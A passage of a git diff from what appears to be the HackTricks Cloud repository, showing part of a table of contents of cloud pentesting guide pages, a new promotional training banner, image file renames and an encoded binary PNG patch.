Enum](pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md) + - [AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md) + - [AWS - Nitro Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md) + - [AWS - VPC & Networking Basic Information](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md) + - [AWS - ECR Enum](pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md) + - [AWS - ECS Enum](pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md) + - [AWS - EKS Enum](pentesting-cloud/aws-security/aws-services/aws-eks-enum.md) + - [AWS - Elastic Beanstalk Enum](pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md) + - [AWS - ElastiCache](pentesting-cloud/aws-security/aws-services/aws-elasticache.md) + - [AWS - EMR Enum](pentesting-cloud/aws-security/aws-services/aws-emr-enum.md) + - [AWS - EFS Enum](pentesting-cloud/aws-security/aws-services/aws-efs-enum.md) + - [AWS - EventBridge Scheduler Enum](pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md) + - [AWS - Kinesis Data Firehose Enum](pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md) + - [AWS - IAM, Identity Center & SSO Enum](pentesting-cloud/aws-security/aws-services/aws-iam-enum.md) + - [AWS - KMS Enum](pentesting-cloud/aws-security/aws-services/aws-kms-enum.md) + - [AWS - Lambda Enum](pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md) + - [AWS - Lightsail Enum](pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md) + - [AWS - MQ Enum](pentesting-cloud/aws-security/aws-services/aws-mq-enum.md) + - [AWS - MSK Enum](pentesting-cloud/aws-security/aws-services/aws-msk-enum.md) + - [AWS - Organizations Enum](pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md) + - [AWS - Redshift Enum](pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md) + - [AWS - Relational Database (RDS) Enum](pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md) + - [AWS - Route53 Enum](pentesting-cloud/aws-security/aws-services/aws-route53-enum.md) + - [AWS - Secrets Manager Enum](pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md) + - [AWS - SES Enum](pentesting-cloud/aws-security/aws-services/aws-ses-enum.md) + - [AWS - SNS Enum](pentesting-cloud/aws-security/aws-services/aws-sns-enum.md) + - [AWS - SQS Enum](pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md) + - [AWS - S3, Athena & Glacier Enum](pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md) + - [AWS - Step Functions Enum](pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md) + - [AWS - STS Enum](pentesting-cloud/aws-security/aws-services/aws-sts-enum.md) + - [AWS - Other Services Enum](pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md) + - [AWS - Unauthenticated Enum & Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md) + - [AWS - Accounts Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md) + - [AWS - API Gateway Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md) + - [AWS - Cloudfront Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md) + - [AWS - Cognito Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md) + - [AWS - CodeBuild Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md) + - [AWS - DocumentDB Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md) + - [AWS - DynamoDB Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md) + - [AWS - EC2 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md) + - [AWS - ECR Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md) + - [AWS - ECS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md) + - [AWS - Elastic Beanstalk Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md) + - [AWS - Elasticsearch Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md) + - [AWS - IAM & STS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md) + - [AWS - Identity Center & SSO Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md) + - [AWS - IoT Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md) + - [AWS - Kinesis Video Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md) + - [AWS - Lambda Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md) + - [AWS - Media Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md) + - [AWS - MQ Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md) + - [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md) + - [AWS - RDS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md) + - [AWS - Redshift Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md) + - [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md) + - [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md) + - [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md) +- [Azure Pentesting](pentesting-cloud/azure-security/README.md) + - [Az - Basic Information](pentesting-cloud/azure-security/az-basic-information/README.md) + - [Az - Tokens & Public Applications](pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md) + - [Az - Enumeration Tools](pentesting-cloud/azure-security/az-enumeration-tools.md) + - [Az - Unauthenticated Enum & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md) + - [Az - OAuth Apps Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md) + - [Az - VMs Unath](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md) + - [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) + - [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) + - [Az - Services](pentesting-cloud/azure-security/az-services/README.md) + - [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md) + - [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md) + - [Az - Application Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md) + - [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md) + - [Az - Automation Account](pentesting-cloud/azure-security/az-services/az-automation-account/README.md) + - [Az - State Configuration RCE](pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md) + - [Az - Azure App Service & Function Apps](pentesting-cloud/azure-security/az-services/az-app-service.md) + - [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md) + - [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md) + - [Az - Function Apps](pentesting-cloud/azure-security/az-services/az-function-apps.md) + - [Az - Key Vault](pentesting-cloud/azure-security/az-services/keyvault.md) + - [Az - Logic Apps](pentesting-cloud/azure-security/az-services/az-logic-apps.md) + - [Az - Management Groups, Subscriptions & Resource Groups](pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md) + - [Az - Queue Storage](pentesting-cloud/azure-security/az-services/az-queue-enum.md) + - [Az - Service Bus](pentesting-cloud/azure-security/az-services/az-servicebus-enum.md) + - [Az - SQL](pentesting-cloud/azure-security/az-services/az-sql.md) + - [Az - Storage Accounts & Blobs](pentesting-cloud/azure-security/az-services/az-storage.md) + - [Az - Table Storage](pentesting-cloud/azure-security/az-services/az-table-storage.md) + - [Az - Virtual Machines & Network](pentesting-cloud/azure-security/az-services/vms/README.md) + - [Az - Azure Network](pentesting-cloud/azure-security/az-services/vms/az-azure-network.md) + - [Az - Permissions for a Pentest](pentesting-cloud/azure-security/az-permissions-for-a-pentest.md) + - [Az - Lateral Movement (Cloud - On-Prem)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md) + - [Az AD Connect - Hybrid Identity](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md) + - [Az- Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md) + - [Az - Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md) + - [Az - Cloud Kerberos Trust](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md) + - [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md) + - [Az - PHS - Password Hash Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md) + - [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md) + - [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md) + - [Az - Arc vulnerable GPO Deploy Script](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md) + - [Az - Local Cloud Credentials](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md) + - [Az - Pass the Cookie](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md) + - [Az - Pass the Certificate](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md) + - [Az - Pass the PRT](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md) + - [Az - Phishing Primary Refresh Token (Microsoft Entra)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md) + - [Az - Processes Memory Access Token](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md) + - [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) + - [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) + - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) + - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) + - [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md) + - [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md) + - [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md) + - [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md) + - [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md) + - [Az - SQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md) + - [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md) + - [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md) + - [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md) + - [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md) + - [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md) + - [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) + - [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) + - [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md) + - [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md) + - [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md) + - [Az - Service Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md) + - [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md) + - [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md) + - [Az - SQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md) + - [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md) + - [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md) + - [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md) + - [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md) + - [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md) +- [Digital Ocean Pentesting](pentesting-cloud/digital-ocean-pentesting/README.md) + - [DO - Basic Information](pentesting-cloud/digital-ocean-pentesting/do-basic-information.md) + - [DO - Permissions for a Pentest](pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md) + - [DO - Services](pentesting-cloud/digital-ocean-pentesting/do-services/README.md) + - [DO - Apps](pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md) + - [DO - Container Registry](pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md) + - [DO - Databases](pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md) + - [DO - Droplets](pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md) + - [DO - Functions](pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md) + - [DO - Images](pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md) + - [DO - Kubernetes (DOKS)](pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md) + - [DO - Networking](pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md) + - [DO - Projects](pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md) + - [DO - Spaces](pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md) + - [DO - Volumes](pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md) +- [IBM Cloud Pentesting](pentesting-cloud/ibm-cloud-pentesting/README.md) + - [IBM - Hyper Protect Crypto Services](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md) + - [IBM - Hyper Protect Virtual Server](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md) + - [IBM - Basic Information](pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md) +- [OpenShift Pentesting](pentesting-cloud/openshift-pentesting/README.md) + - [OpenShift - Basic information](pentesting-cloud/openshift-pentesting/openshift-basic-information.md) + - [Openshift - SCC](pentesting-cloud/openshift-pentesting/openshift-scc.md) + - [OpenShift - Jenkins](pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md) + - [OpenShift - Jenkins Build Pod Override](pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md) + - [OpenShift - Privilege Escalation](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md) + - [OpenShift - Missing Service Account](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md) + - [OpenShift - Tekton](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md) + - [OpenShift - SCC bypass](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md) + +# 🛫 Pentesting Network Services + +- [HackTricks Pentesting Network$$external:https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-network$$]() +- [HackTricks Pentesting Services$$external:https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh$$]() diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md new file mode 100644 index 000000000..b03deaf4a --- /dev/null +++ b/src/banners/hacktricks-training.md @@ -0,0 +1,13 @@ +> [!TIP] +> Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +> +>
+> +> Support HackTricks +> +> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +> +>
diff --git a/.gitbook/assets/05-constraints.png b/src/images/05-constraints.png similarity index 100% rename from .gitbook/assets/05-constraints.png rename to src/images/05-constraints.png diff --git a/.gitbook/assets/2023-03-06 17_02_47-.png b/src/images/2023-03-06 17_02_47-.png similarity index 100% rename from .gitbook/assets/2023-03-06 17_02_47-.png rename to src/images/2023-03-06 17_02_47-.png diff --git a/.gitbook/assets/2023-03-06 17_11_28-Window.png b/src/images/2023-03-06 17_11_28-Window.png similarity index 100% rename from .gitbook/assets/2023-03-06 17_11_28-Window.png rename to src/images/2023-03-06 17_11_28-Window.png diff --git a/.gitbook/assets/2023-03-06 17_11_43-Window.png b/src/images/2023-03-06 17_11_43-Window.png similarity index 100% rename from .gitbook/assets/2023-03-06 17_11_43-Window.png rename to src/images/2023-03-06 17_11_43-Window.png diff --git a/.gitbook/assets/2023-03-06 17_28_26-Window.png b/src/images/2023-03-06 17_28_26-Window.png similarity index 100% rename from .gitbook/assets/2023-03-06 17_28_26-Window.png rename to src/images/2023-03-06 17_28_26-Window.png diff --git a/.gitbook/assets/2023-03-06 17_28_50-Window.png b/src/images/2023-03-06 17_28_50-Window.png similarity index 100% rename from .gitbook/assets/2023-03-06 17_28_50-Window.png rename to src/images/2023-03-06 17_28_50-Window.png diff --git a/.gitbook/assets/CLOUD-logo-letters.svg b/src/images/CLOUD-logo-letters.svg similarity index 100% rename from .gitbook/assets/CLOUD-logo-letters.svg rename to src/images/CLOUD-logo-letters.svg diff --git a/src/images/CLOUD-web-logo.png b/src/images/CLOUD-web-logo.png new file mode 100644 index 0000000000000000000000000000000000000000..1671d0bf87a70624ef869e65b3c7c0ef3a15905f GIT binary patch literal 14122 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%0APJubNLpK0kwg#k`k=XT_%n~=DGsqfJt3C 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 